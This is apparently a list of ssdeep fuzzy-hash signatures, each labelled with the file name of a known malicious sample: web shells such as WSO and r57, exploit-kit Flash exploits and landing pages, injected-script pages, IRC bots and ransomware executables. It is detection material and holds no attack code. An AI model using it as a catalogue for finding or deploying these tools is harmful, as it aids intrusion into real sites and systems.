+1536:eaUWRwgxmGJZki2B2zImCL1PtZq59v6fcvTzwa2IiFfYPhu6zJ7RucJn5G/9HT:eaUW6gxmGJZkPB2zDCL1PtZe9v6fcvTq,"wso.aspx"
+1536:eAPn13DZXS/ejVGzIdeS7Phh2FioHkcX+uRT/Kc1:eu5BJjv7o9X+upN1,"ly0kha_backdoor.php.txt"
+1536:e9U4uYdBLQ5Zag4z/RUUAOKh6HyN3i2D+SbZxlnppzZ/uHxeg:sdBLQTvk/OIKh6HvqTztlO,"ASPXspy3000.aspx"
+1536:e9U4rYdBLQ5Zag4z/RUUAOKh6HtN3i2D+SbZxlnppzZ/uHxeM:5dBLQTvk/OIKh6H6qTztl6,"aspxSH_by_Bin.aspx.txt"
+1536:e9U4LadFLQ5Zag4B/RUUAOKh6S+NYi2D+SbZxlnppzZ/uHxe5:ndFLQTvA/OIKh6SCqTztlj,"lpl38-com-aspx.txt"
+1536:e9U49bdwlQeZag3WoUdAQKw6wCNDTYjwzZl8nZNdiraqx:kdwlQQv3WXHKw6wKrq6B,"111.aspx"
+1536:E99mcsmkfBWnRl32vl9lbi4Km/G8nowx1kaedP5jQG3pW:imcsmkfIJ299lbi4nowxGagH3I,"2011.php"
+1536:e6UGYrO6+GgGCDN6Tpk5K2wSne+QwN1sL88cv40hC:e62B2M1kMSJxv4r,"index.php"
+1536:e6TYxya/wtm5mxT9YunwtSZCVZnQWLK/0tig2JRxWlv5rlIgnSPTCvatKy:gxjNcWZQvGYYhJIgnSPEy,"body.113.129"
+1536:E6TYxYamEgwBfwbhmGYy9BOXZyxO3K6R9nP/Ky4JvamK+QgtSPTCv0tS:Cxk/YoBOXZyp62ta/+QgtSPW,"body.114.002"
+1536:e6TYxXEXFwUkshfDAsP40rjnyqCGyi/PRjRgnyPTCv+tKy:gxeFWsJD5bJRgnyPAy,"body.124.001"
+1536:E6TYxXEmQwa6FuO4dVCD0kN2sRCDUxkW/FxfExglpSrwjfgnyPTCvEtKy:CxHQ6uOSVCD0kUspxbBfgnyPqy,"body.113.263"
+1536:e6TYxXEm88gV94Fr7uM1CwWc65LTDm7mfCRPyyLFcpXgnyPTCvGtKy:gxfLgSugCwWcIqXcpXgnyP4y,"body.113.360"
+1536:e6TYxXEbjwCmvSbSHiK4U4MLfeOCTTv2oI1RJfwmULSsgnSPTCvCtKy:gx6jjmvSbSmTIsgnSP4y,"body.119.002"
+1536:E6TYxXE3wSAvpF+9xt2STMREsoZoA3GURjASFCN8WLQcrQdaWgnyPTCv4tKy:CxWuF+9xt0A3lSNjWgnyPmy,"body.113.275"
+1536:e6TYxsELwFdbTzaXUC5lHiore7hy6C92phH5eRaLoz35rl7gnSPTCvqtKy:gxTcaxrAy6p+J7gnSPoy,"body.123.001"
+1536:E6TYxsECwN5zuFIlzV2+uKwHzwjU6yJ+PaYAjzaaXOrlvgnSPTCvMtKy:Cxqc2+uEgVcJvgnSPiy,"body.113.201"
+1536:E4NFsetaNWwuD1o0YDDrkmy+QHTv2HxpDfB2PPQY4+PQ0YmSeintWE/vMOSKUr:E4NFsetaNk+lzkt+QHTv2HxpDfwPPQYR,"b374k-2.3.php"
+1536:E4+cgAvGadS+yOBWPkuc/5tCGvn+TqoiLsRMF51c3STm8Atp9RLpzyujfY/:8TkZ5F51CSTm8Atc,"r57shell-v1.23-pang0.php"
+1536:e2kuedOuTGVJcq3tcLXm23A4VEA11vne1stY:BedOuTAJcmBLA1hG,"Crystal.jpg"
+1536:e2GMfC4UJ8SYZJr/y16D1WeFFR4R1efIlk6QKMc7hmiEz1xKLKGObP+FrOBy9EPT:6MNUZ1KrEkihmZzKL6GyvEy,"VirusShare_7b698c527b2bd42b7b9a30b4aee93581"
+1536:e25bjoSgQ4yyfYdxSDFepQrN2MSFwhNH+Nlv8+YK45m29/mESoQjDLbYpWgKCC:X5bjoSghmSDFeONgwhYv8PK4LFz4XYjY,"2016-07-19-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:dy2ou7a3iP/fi3NW4YIC+7FMJR7G8s+xhaBc:dy257zqHYICQFMJR7G8s+xhai,"2016-02-22-page-from-compromised-website-syndersofhanover.com.txt"
+1536:dXgIk3jl42ltxuyRqePRcZcuAh0/qLKAafQ7u7/k8ZSSSSSSSSSSSSSSSSSSXA61:9RGtcyP9pGnfsu7/k8ZSSSSSSSSSSSSv,"2016051523124431883.png"
+1536:dWoovgmwsL0gK0mnC86F0cGEVldiQJ81MLNHzbg1AHZvJAakvLZs3IX2cMsfm7Z3:dmtwH5nnAX9DiQJZo10xuLZ92JZi,"2016-04-07-EITest-Angler-EK-payload-first-run-gootkit.exe"
+1536:dw4Wcunt0Ent0en3RSAYIODV4iSJypykUGtNPKhXzb:mSAcSJHhXH,"2016-08-18-page-from-marksandciraco.com-with-injected-script.txt"
+1536:DVcPjInZ1BcolL4YLPGGGGGTGGGGGGGGGGGGGGGGGGGGGzcFSVqqqqqaDGGGGG4O:RcPm96IcgwJWFO,"PHPJackal2.jpg"
+1536:DuysSPUW+mE2KUNTI18KnmFrz+nQvGxNZm6ZKB8wlqSRRxoAZoKriTulrb6AZ2tk:DhrQh2lNTISKszjvwPmfqSRLFZoGiTup,"Backdoor.ASP.Ace.de-L.S.T.技术性联盟.asp"
+1536:DTcNJWJcvvmmM9KzVplyqRAynnk4U7NJv3PDZ:Do8KzVpPRvnUzZ,"WSO-Web-Shell-v2.5.1b.php"
+1536:dsNXIlidyzaWRNe2dzaWRNedOnn9cum26bkWsEKpcUT:dq5WPMkWsdT,"css.jsp"
+1536:DSh85WDJXsfGm7oMur3AfhpFnswySbO2XOROnBLnopuYsKcmkKOR6v+UR0hd0Wb9:kDJ8f9l8qpFsHSbO2aOn1GsKVIK0DNa8,"2016-06-28-pseudoDarkleech-Neutrino-EK-flash-exploit-after-gennaroespositomilano.it.swf"
+1536:drnQGVwaS4bbJ/PMtlpzsUR2yOGQ2b1qq/+Wzo9:ddPMtlptRhIebM,"wso.php"
+1536:dQmBrWhwm2bcvXkGcPgYmAECJVhAjs6vXKF7:vFpbakGP0ESPAw6vq,"WG Gutschriftsanzeige zu RG 330253  5716301 Arvato Geburtstagskarten Art. 99647.msg.eml"
+1536:dqeBbR9g8xLSB1G8I+TqoiLsRh6OET51VUWqSTmt+EjHTSHUVp0on5Z0ydVYY:NBbR9g88RgT51YSTmtUa,"r57.php.php.txt"
+1536:DLSXSLUZ1oqeQp+WXZ6h9WZNz7lvVkjGefvLzbXB7x6npL7wi7KWQcm:PSDZ1oqeQ/ev2pQi+n,"2016-02-17-Admedia-Angler-EK-landing-page.txt"
+1536:DLcNJWPcvvmmM9KzVplyqRAynnk4v7NJv3PDB:DA8KzVpPRvn7zB,"wso.txt"
+1536:DlcNJWJcvvmmM9KzVplyqRAynnk4v7NJv3PDZ:Dq8KzVpPRvn7zZ,"WSO-Web-Shell-v2.5.1.php"
+1536:DL8uSFXiwvN974h5eBjtF4e7iPuSzRzWO5+5hw6G+ZUSTmx+EABcuZ9778g9WCHJ:DL82wFVO65ie7iPuSLMhw6GrSTmxMrB,"823d61741c7bcc665862a80b7f61ea71_php.txt"
+1536:dl6TYxXESSdw34xm/juhOuhAqI9h3Xya9UUmErquGtsRyf8XjmgnyPTCvzbtKy:dLxvSdA40/jusuNynOWtmgnyPaYy,"body.122.002"
+1536:dKewSilJq+Z1dB6npG8ACm9zMRr84FYdVYaXGRrLG2/UF1CR6rOWRNM:dKLSi3Z1Ec8uGQB8gwUF1CSP7M,"2016-07-07-Neutrino-EK-flash-exploit.swf"
+1536:D/j47UvOFJtH2Vxh1PkbkxFlfwPE+HbT+7m/7X:jjp2FJtHS7PkbaloPEw+7u7,"404.php-2"
+1536:Di0myqs6aoeGpqhwgi46LmUs92I5ksDIQLEbHgcg:rmxIhzImUs9J5k77u,"phpspy_2008.php"
+1536:dGtoazZnxo3dMhPb7tLL05R3QGPwVxU6s1oDZ16Ne9nWnd5V:daoKZxo3SPntLL05R3ixEQZINe9n21,"2016-07-21-EITest-Neutrino-EK-flash-exploit-after-chitralekha.com.swf"
+1536:dfswivjRmK1+tpDEfT6aaRGpUhigu2aixg9t7p0UJ4Tb5LCyOtuS1LCtT:d+mK1+tpkGhVu2aie0UJ435LaD0V,"angel.txt"
+1536:dEPJBiWoivmntxLtIVb4l9SsAy2pgr97W3gzq+I+nBqOWOyhxy:SOivmtx2cSsABnOWjhxy,"不灭之魂.asp"
+1536:dEJo7021nICPR5wLR8DAZ1HO7coGfAsg7OCI2y4iPjMzwH64K2qXzGwTy:dYH45wLRTO4MLy4yjM0RvwO,"dict.txt"
+1536:dcr+mF0axqgTeGHTw/qDIIeUME4CpcBil6b4N/e2xiJSY:dkUIzw/+IIOE4lilG4N/riJb,"2016-06-21-pseudoDarkleech-Neutrino-EK-flash-exploit-after-fsm-europe.eu.swf"
+1536:DCJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xkZI:DCfQl0xyZYpqxJr,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-5th-run.txt"
+1536:DCJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xkYS:DCfQl0xyZYpqxJ8,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-6th-run.txt"
+1536:DCJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xk/S:DCfQl0xyZYpqxJF,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-8th-run.txt"
+1536:DCJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xkLS:DCfQl0xyZYpqxJZ,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-1st-run.txt"
+1536:DCJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xklS:DCfQl0xyZYpqxJ5,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-2nd-run.txt"
+1536:DCJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xkGS:DCfQl0xyZYpqxJy,"2017-03-10-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-4th-run.txt"
+1536:Dcaq2URNQqLYdViXsicoShBuYIWOFdqa/KR2fTj04wAs0gjtjl1:DhOYdVi8horYIWOFdpcI04fDgjtjl1,"Backdoor.ASP.Ace.w.asp"
+1536:dA34UO7ah2A01y83Y/QMrQttHh34n97XgPtlQ2B:o4UO7aX01u/stHhKXgPXQ2B,"5.php"
+1536:D9fmcsmkfqW61l32vl9lbi4Km/G8nowx1kaedP5jQx3p4:tmcsmkfuJ299lbi4nowxGagI3y,"spy.php"
+1536:d8mYoExgUEvvDjDSwwhqWKzaJQKw13u4aJ7fSx/r0JSqqLYmbFwwnIjAALYTxPTP:dgnczjSCKkDaJ7Bq1hTz51nbH,"1.png"
+1536:D6ubQ0wZ+gNf4NYJa4lezoTe9MTrVr4aC2+qlnjJES8RgwcA5mJpZAVP8FtWzH3q:DU0wZJGT4l9VVpJpZAVP8RBn,"phpjackal1.3.txt?"
+1536:D6TYxYawwoNMdViCo/qXYtOJZfyIBX8QYmEszG6zqgtSPTCvPtS:txqtNM1syYtOJZFlqgtSP1,"body.113.042"
+1536:D6TYxyauwQPK92i1lPPPMOROFKSRNRbNRF0fIodU/GyhwxWIpOrlCgnSPTCvntS:tx6o1lPPPvOFKSRN5N30chRJCgnSPF,"body.113.075"
+1536:D6TYxYatbUmWmDmWmyrRKe925We5TPzZNIZYF1ftqZGmtRF2hVvz8gtSPTCv7tS:txjATSTjrUegMeZLZNIZUNz8gtSP1,"body.113.045"
+1536:D6TYxyaAwhQOz5O4nfrLsTfau/Vuxw1Symc7P3lVHt7RX3+t576ziSnbs1TKF/OU:txkKKTQyNzk7ajaIhL/jJDgnSP9,"body.113.076"
+1536:D6TYxXEw88hPl3pqlaS47rhk45AUIonXOhqdwREZU0GFtgnyPTCvntKy:txZLhPl3pqcSe5jIoitgnyPly,"body.113.286"
+1536:d6TYxXEu886ZWYaxSCQRhelHorWgYdPGhLJgoY1cLal/B1PSeGMgnyPTCvptKy:TxfL6cYaxSCyYlXdPGhLXFeGMgnyPHy,"body.113.349"
+1536:d6TYxXEP9wuRoSCfO0l4Ob38HOaez3ctZDzTfoYzQBaAgnyPTCvdtKy:Txy9VRo3fJ4OL8HOa7pFAgnyPzy,"body.113.268"
+1536:d6TYxXEO88GkHdEZzC3VkgWVH7bNfNiRUu31TC4dV2E4PgnyPTCvhtKy:TxZLBEZzC3CZV3Nfc6PgnyPby,"body.114.010"
+1536:d6TYxXEjdwbFqcBX4AVQU7H+tHqLxjvuz8gua0ZaggnyPTCvltKy:TxOdkFxVvGHESggnyPny,"body.113.258"
+1536:D6TYxXE2wl+a2/asKPw3VxfTY3Kuc5ys9AavcMIIziznafgnyPTCvXtKy:tx3Y2/aGU3k5pBfgnyPhy,"body.131.001"
+1536:d6TYxXE088jEsjML5i2r4/eW8Xg5vLov304CdBItI72k/PGjUgnyPTCvVtKy:TxPLpMH4MXgpoc/jGUgnyP3y,"body.113.290"
+1536:d6TYxsEOwN0Sseiyr4R3S9HeXZPztPAu3OHqycwPk4G016hoOrl9gnSPTCvptKy:TxGO0SNr4R3fxztPAu3O63J9gnSPby,"body.113.205"
+1536:d6TYxsEcwkxOml5FOxJD35Dc/o9csj/U7ZYFsrl2Qa71zcOrlFgnSPTCvFtKy:TxEdOmlDOxJ1Dtcsjc7XiJFgnSPvy,"body.113.164"
+1536:D6TYxsE4IwutGDxJxtS9mAvQey3eypigdBmoOrlSgnSPTCvftKy:txQIQztSdvmgJSgnSP1y,"body.113.224"
+1536:d6da1CPyexG/gPAXM8i130XwSCSnXDNCq:d6dICPyudnh0Xpnv,"indrajithv2.txt.001.001.001"
+1536:D5cNJW5cvCmmM9Kz6plyqRAyInA4v7NVv3PDJ:DetKz6pPRvA7zJ,"VirusShare_c84c0cb3366ff51be6ae18bcc15f726e"
+1536:d4Djg4CvjWu991ANxtkKJdt5BrNzpMlz6737EFsIrzDLUiiUP:KXgfjfQffJdtTxp6A37EFsIrz0UP,"2016-07-27-Afraidgate-Neutrino-EK-flash-exploit-first-run.swf"
+1536:d3ivjRmK1+tpDEfT6aaRGpUhigu2aixg9t7J0UJ4Tb5LCyOtuS1LCta:d+mK1+tpkGhVu2aiC0UJ435LaD0Y,"phpspy_2011.php"
+1536:d3iijRmK1+tpDEfT6aaRGpUhigu2aixg9t7J0UJ4Tb5LCyOtuS1LCta:dfmK1+tpkGhVu2aiC0UJ435LaD0Y,"angel.txt.1"
+1536:d2k7E1KZDFeDfglZky4CF50jrP0DJEZ/G0YH/gjfUuuvIfWrfxj:dXgobky4CF5IP0DseXKywfox,"2016-07-08-other-Neutrino-EK-malware-dropped-after-infection-svszclp.dll"
+1536:CZODQIUWS44vuJV3UMXtpm3ARJS/mdtkW3SZ:C23U8tp0ARnd/A,"95JjrsHM"
+1536:cyY2LdJsg+dsRbGGc7/PAY48B4JkFMQq24wushAnBCT3Bc8jtJFOFZQ0j4lVw:cT4mwc7/IY54JkFMQq24wushAnBCT3BW,"dal-net-irc-bot-ama.pl"
+1536:cvVlF4PbYwgJxTyRMkLcdxouH+HoIXs3d:ctzxwgJxmRMTH+HoIX2,"2051.32640.php"
+1536:cvVlF4PbYwgJxTyRMkLcdxoJhqzUIXs3d:ctzxwgJxmRM8hqzUIX2,"Thumbs.db.php"
+1536:cV79v+o+exg7lZVpGEvd8LGzjSvWNEtj2:09v+DeCOjL+ZIa,"b374k-2.7.php"
+1536:CUwDSw2QUVfy1FzNcr1jCyCwa8UDh7OwOyrTEMksPOQItT8Yc3Ti8VcED:CU4Sw2QyypOxUDNTOyrTEMfPOQIt4b3V,"body.283"
+1536:CTEpudhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:Cm,"good.php.41"
+1536:CSQViTdqR0JHAYaJFnaefCAHspjq66SK2tlBRrsh8AcZbBd6znA3otgf+mDH:ZQmkeHAxBaefC8mjPFx1AcJ4rmDH,"xgr0up.txt"
+1536:CsNXIlidXzaWRNe2dzaWRNedOnn9cum26bkWsEKpc9J:CqaWPMkWskJ,"ma3.jsp"
+1536:Cs447lEoz4u9UETVlukVt9JW4VLx/unoDSSR027br/n3z+dDakdzyqyxigT3xUdK:rWyVknoDSkaDQ,"r57.txt.001"
+1536:crqYWQNbvgdOqwzyMWkLoPplNH3DQwJs8tKmpRG11:wAQNb4iJWdpT3DQF8kcG11,"oi.php.txt"
+1536:CM1DSwc03Og+oabWxqc6U9Iw76KH/hFZjef3vt9L/p/Mrya6Qo2KdvfPepodTmF4:CM1DSP0eg+Zb+qcz/nZj09eOdTmFYNjL,"2016-05-16-EITest-Angler-EK-landing-page-second-run.txt"
+1536:cl/Y0OAsPpoWffjYzuaNER76PyveDo+9VckcSrrSeGJkwhywZ0UrxmLjg:KQ0OtpogjWL876PyveDoYccMh7Nmw,"Dx.jpg"
+1536:CjwMOcNkqmaBOR8yQn9mmMaKXPMVplyAC4C6Mg63Pf/V:CcMURDo1KXPMVpHIN,"wso-4.2.1.php"
+1536:CiNXIlidXzaWRNe2dzaWRNedOnn9cum26bkWsEKpc9h:C0aWPMkWskh,"ma3.jsp"
+1536:CgCXUQXvADG2igeG739EwLl+IhwfHH/CUxfssNSSd:xQXvj7gNqHH6ifss3,"iMHaPFtp.jpg"
+1536:cfWMOcNNqtaBORk+cr9mmMaKXPzVp+y364C6MIy3PfPh:cOMyRjK1KXPzVpzwp,"wso-4.2.5.php"
+1536:CFWbqkFWNPN8Wxuy1U5Ld03gt7I9p/K4zeVKjneFJh:CwbbWNPNRlYqwtEpiijnkh,"2016-03-29-pseudo-Darkleech-Angler-EK-flash-exploit-after-onebusiness.ca.swf"
+1536:CfDObvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfi:CfDObvw60sWyB5Vx3ju1Ua9mE9x7CSlD,"swift 899f.js"
+1536:cesMVDSUuqGHJmfqE5qdoaoKMMBWHKUiGlijx3a:nbJSdqDqzoaonM0HyTx3a,"Win32.Alina.3.4.B.zip"
+1536:CEGKal6gQzjreP/cyaRUKmGmleJVN9qyfY4N2J6CNSExDcLj0h+nLrIkL+pQQrnb:Jal6dreP/cyaRUKmGmleJVN9qyfY4gJ/,"Web_Shell-con2.asp"
+1536:CDHWpKAZuwtaScYmUk3iGZzHkcdGdGncTW5nqwojwul4J2lSaHPlqUz72XOvDtdx:CDXucFoKv++cTW5qwywS4J2lSaHPlqm3,"Backdoor.ASP.Ace.ev.asp"
+1536:cd62BibeHPiaQ6mfTV3RcHOh2DicL6vM+upD2a++o5+TSd9KKlqdwWX2q7gs9m89:cd62BibevdQ6gB3RTCicuvMtNj+9+TiQ,"I-47 v1.3.php"
+1536:cAX0ORj0v5SzXVKqnKM2tOOmP2rUWStR5YygNU/RdgDvb9zg:fXZRj0v5Kg3sODwWS9pjJ2Dvb90,"Gh0st1.0-ghost-obf.php"
+1536:c6TYxYaQJwgC6O1Z3z2FDbVzVPfpQQMkco/DFVeZEi6syzjL038ZujgtSPTCv0tS:KxSUZ3z2F+QMkcMeZPjgtSPe,"body.113.050"
+1536:C6TYxyaGwifYHQXdVBWWXqiAzOa0XjGIVZnu+XjYrK8V5rlNgnSPTCvStS:UxKZlXdVBWWXqiAia0XjrgpJNgnSPM,"body.113.065"
+1536:c6TYxYaEJNzJU4nSVNUWYptmomIZYFQLPo5rNBh3fcs8t7agnSPTCvctS:Kxe/zJUKSVmWXIZkhl8agnSPO,"body.113.056"
+1536:C6TYxYadJuoqE6WccC8Qs1X/f4FcTZFDYm4jMlfej2OOfuDgtSPTCvWtS:UxDLq/Wccdf4FcTZhYlDgtSPI,"body.113.046"
+1536:c6TYxYabbsbEsFkMpKbIGFCaFw2ZF6ZteAg2eF/TCNNudgtSPTCv8tS:Kx5YbJKTFCaW2ZasUOdgtSPi,"body.113.040"
+1536:c6TYxXERwjqNTswitnri+itmWTH+99Asg2rirBAoQFUxTPp0lNfSOgnyPTCvItKy:KxGxNYwit5WTP2rirpy6OgnyPKy,"body.113.256"
+1536:c6TYxXE8n88O7oUG72MC7fLHYrR8iOEKvh+7OVcHjXOgnyPTCvQtKy:Kx/nLO8UKC7fLHYfOCXOgnyPSy,"body.113.326"
+1536:c6TYxXE388h8UxDxQr+WoidhLpMsm6EX8ZbUUNyC5wRz9UArXLazzBgnyPTCvwtt:KxULh8OQxdFmX8ZIU9ZzzBgnyPGy,"body.113.330"
+1536:C6TYxsEYw79IID/XUgn4iLmTMAx3KDOOrlMgnSPTCvCtKy:UxQ+IeE9+zJMgnSPYy,"body.113.210"
+1536:c6TYxsEXw0eJzuRHyPbUIW3kwxkKF5rl4gnSPTCvUtKy:KxfvRy5MJ4gnSPey,"body.113.222"
+1536:c6TYxsE/wmlDS5j3lawoJVqlGLoMB7TFrLZ/ymyOAC3aQUJ5rlQgnSPTCv8tKy:Kx3vl+p3ldoqljMtRrLEOJKJQgnSPGy,"body.113.171"
+1536:c6TYxsENw7QNfWsEJWrv4EmDcgPCLU3lgNw7vsekjAzSE5rlegnSPTCvMtKy:KxF3fN4w/4tSjAJegnSP2y,"body.113.178"
+1536:C6TYxsElwYqOuFx6lC2JhTOx7TkdyD2WxoMEV3ROrlPgnSPTCvStKy:Uxt5u6lCGCCF8JPgnSPIy,"body.113.175"
+1536:C6TYxsEHwAYPbAFYnbPbWBlyHfPd7R8Hp5scL/EzFOjNn1kDPQv0Z05rlCgnSPTj:UxPZFYnuB47TcL/EzSaGJCgnSPAy,"body.115.001"
+1536:C3BIQ/Tm/B/5knQ6p9aWxkEyBdztWKXj5YhrywLJgIKmuNAmr/sdY3M9T:nQbE/qQyqVFrYhrpLJPsd/TM9T,"2016-07-11-Afraidgate-Neutrino-EK-flash-exploit.swf"
+1536:c0J0zkvWpk8Lv0yFh/X04QiZi2BFFpBFqFBF94BFY187hSH1jh0Qp/xM:rmzSBiZi80/T187hz,"2016-06-10-page-from-joellipman.com-with-injected-pseudoDarkleech-script.txt"
+1536:ByRctXYxLOnnZWorNbJIlFKtAMyZbGeHVtuDlSX7q+XBOk:BP3EoglFZltu3+ROk,"webshell-123.php"
+1536:BVYdSIw0GOuMAQUGQHbe46gKrDubzpj+jvpTGQQOE9tD2:BVYdSIw0G8eGQ646gKrDuXt+ZgtD2,"DxShell.1.0_hk.php"
+1536:bua+BwUXzZAGYzvjcwf58uoUicpHATxqlrH4RQ2d4mgBx:bJ+BwUXzZUjcwf5FrpHATMxYRQ2d9i,"view-sep2-2016.php"
+1536:BNTik5pq2b3NRRQx8ZAqw5vEhpNyRDUxcklrXZy50ZVihYtyZ7K+NSvZMmGxwD:BNTik5pBpRRdZbth+DUrlr2AxyZpQvZ7,"2016-04-05-TeslaCrypt-decrypt-insructions.png"
+1536:bLYzueLOVkI2eXElyW2RbrCvP2BhwOpbKYPZ/KOL1x51L2v:nYzucWd2eXElyJRbrCvP2BhnpbK0KOLY,"cowboy-shell-ircbot.php"
+1536:bkcU2Y5MUXkjU9cDXwNeyFlVS7pLtaS5SAjZqGUqaxvEIa6xkYcmfxFyE0jpb2a6:bkd2Y57VAKfktRUA6k0pfTRVgipsBO,"2017-03-02-page-from-hurtmehard.net-with-injected-script-2nd-run.txt"
+1536:bJNx7zz899wnH6zYHC4LyEQ4I1HWGQWzWae686za1L5fw0VdTHf1lMFjeBHGBZBn:9Nm4Uq+J8V5fVVdTHf1lMFjgKh,"UnKnown 高级Vip防删收费版 (1).asp"
+1536:bi+ZNp18gBvsd67ZgqXvyCCRMkS4A6S4LaCdqz9aOYweAJK66vYXw:bjNpXLZFu414XwBJK66vsw,"themes_full.txt"
+1536:BhdjXnhDuGu8ERm5qD9OFOj+NwZKNPac1dGPz75T2clKUCQsL7XsYmdkdLt1J1Ja:DdjhqGPERt+zUKBEcQsXs1ELbXwX,"2016-08-18-EITest-Rig-EK-payload-Gootkit.exe~"
+1536:bH/28nmILIvyc9NRC/N1ummcN59CpicEgdT6xrVf4kST4fVzF3kTjkP3wwaqN4Rq:z/28wy2vC11ummc59WcgduxrVfwQzyni,"2016-04-26-pseudo-Darkleech-Angler-EK-landing-page.txt"
+1536:bgK7e5mECw+qT0c3S0me5MBXwvfXBs1B9vis9WDiCK7fdaLI7SGyCTTGUz5uq:kKKE++qxLDMZwvfRVCCLLESGHtL,"zjjv.com-phpshell-11065-obf.asp"
+1536:bG72Zr0WIvQNXaEd4YDU7a02TCxI0libSGEF:b7OvQNXaEd4YY7VF,"nixrem.php.php.txt"
+1536:+bEytdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:+m,"good.php.27"
+1536:bEMKal6gQzjreP/cyaRUKmGmleJVN9qyfY402J6CNSExDcLj0h+nLrIkL+pQQrnH:+al6dreP/cyaRUKmGmleJVN9qyfY41Jj,"传说中的hcker.asp.txt"
+1536:bbcaoCK3KBdhHZT7QgDV/Y5bnIrhsevJ3QDISTkQijXOzEYEjfbK9t2ojQVy:o6BdnT8ghMnI7vSDISTkDezCfbqt2eQY,"2016-07-07-pseudoDarkleech-Neutrino-EK-flash-exploit-after-toronto-annex.com.swf"
+1536:B6TYxyHDw+Yb1GBZNkpAzwqmeRCcrDtctuxs2a0OrlygnSPTCvdtS:3x0i1eZNk9e5lCJygnSPD,"body.113.090"
+1536:B6TYxYaUHJj9rT9dYftEPbTqZxzcLql+4d4aBEGewIb+IBgtSPTCvVtS:3x+pj9PYuPHqZCbMeP+IBgtSPX,"body.113.043"
+1536:B6TYxYakwwzrUVng7O2G3GZvSlA+j1jZrLPF74gnSPTCvVtS:3x+XrUV6O2G3GZU4gnSPP,"body.113.060"
+1536:b6TYxyakwwMMcQyHR9lsk9UO3UXlcIP8bfry6UIJBrlLgnSPTCvXtS:1xIUQyHxkVPaJLgnSPd,"body.114.004"
+1536:b6TYxyajwQCv5R8asdF/s9jWi0VKw5HkUOrlCgnSPTCv/tS:1x34v6/0bJCgnSPh,"body.113.079"
+1536:b6TYxyaIwJrK1XF6UtSOWwYrGBrlpgnSPTCvDtKy:1xcErK39JpgnSPly,"body.113.124"
+1536:b6TYxXEX88yDmLro5iPPL9H59lc1guRueTmmiqXPSJuMA1IwSIXSgnyPTCvvtKy:1x6LyDmZXwguRueCwsIXSgnyP1y,"body.113.319"
+1536:B6TYxXEq488nH0/v0vtgko7kscQGP38VhX4i1lvCri4kLj9BHgnyPTCvltKy:3xl4LnMk+cQGP3gT9BHgnyPDy,"body.113.325"
+1536:B6TYxXEn886G3dydFK740uVFeEasIRSj/I4Ao8IHjGaGwFignyPTCv5tKy:3x+L6GtUd0uVFeSIRx0c8ignyPXy,"body.113.301"
+1536:B6TYxXEK88Hs11CIOopA1b3Q2koTh+j/PN0sO8yXIycajLWgnyPTCv5tKy:3xXLHs8ocbg2koTheQzjLWgnyPTy,"body.113.333"
+1536:B6TYxXECcw6Df0ieiEYUwrmwRZF/ZYTy9tp4SCACzSPP1jIgnSPTCvJtKy:3xTcr0iejYVrpF2VWPlIgnSPfy,"body.117.002"
+1536:B6TYxsEzwaTH0wIadaBuQwQaZCUCt4sErAlPuSZ4TOrlNgnSPTCvVtKy:3xb3THOadaBuQwQaZB/r6JNgnSP/y,"body.113.165"
+1536:b6TYxsE+w5HI3TbEOiLFLjmURfJo7izqe5woZjXAlOrlugnSPTCvbtKy:1x2RiLFPFg7w7jhJugnSPNy,"body.114.008"
+1536:B6TYxsEmwyzf8nNXCBYg/PYzKgXB4awDWWBrlygnSPTCvltKy:3x+h8nNyYg/s2JygnSPvy,"body.118.001"
+1536:b0WBmCTjDoNn9pujRxaFi+2MoxizJt6arNzpMlz6737EFsIrzgg7iUc:b0WMUoNEcWTxizBxp6A37EFsIrzgg3c,"2016-07-27-Afraidgate-Neutrino-EK-flash-exploit-second-run.swf"
+1536:aXgIk31a22rX8ih/j4+WQmNdh3StaONmTo:yzYGMJ2aNTo,"2016051523122747980.png"
+1536:aVitV09JONCVOyPJvVIUK5M0Va4eQrkA4Kbpo9Vuuxl+wiLnF2n5+sU7C:aVitV0zGdyPnS5JreYkA4qpo7uuDsnk3,"2016-06-30-Afraidgate-Neutrino-EK-flash-exploit-after-marketingguerilla.es.swf"
+1536:AUismNqs6ao1GpqhwTH46pmUs92I5NMDlrLamKFQcp:A8mRIhObmUs9J5Noa9t,"sadrazam.php"
+1536:asQfN5tC9PamybjFy0U6Xvzq8YfztfHjK4dgeG+oyh:asQfQ9k80U6Xvzq8YfpfHjK4Iq,"DAws.php"
+1536:asNXIlidRzaWRNe2dzaWRNedONnfcGmQ6bkWsE0pcpT:aqI8dMkWsgT,"JspSpy Codz By - Ninty.jsp"
+1536:aSnHk7fLrcFJhB8wD43NzvnuV0ZZbKd3AM2U2Oxjn0t6H0pqoBcSg:hHwXcHhQ3NzfuV0vKdAPjCjs3Bg,"global.php"
+1536:AqTpaB0bJd/rfcMGo/1FiXaSxU1wm7j4FmNRRVzpqevMgymtrJVztfISD4:AMp1/zF7MxU1v4QZpqevAmtrJVziSD4,"2016-07-13-pseudoDarkleech-Neutrnio-EK-flash-exploit-first-run.swf"
+1536:AqTpaB0bJd/rfcMGo/1FiXaSxU1wm7E4RwFmNRRVzpqevMgymtrJVztfISDq:AMp1/zF7MxU1VwQZpqevAmtrJVziSDq,"2016-07-13-pseudoDarkleech-Neutrnio-EK-flash-exploit-second-run.swf"
+1536:aqe2qDqe7+Ogyqe7qG5M7qNwGh7ULJxS:PqGYGYqqNwGhoi,"2017-03-06-Spora-Ransomware-7th-run-Chrome_font.exe"
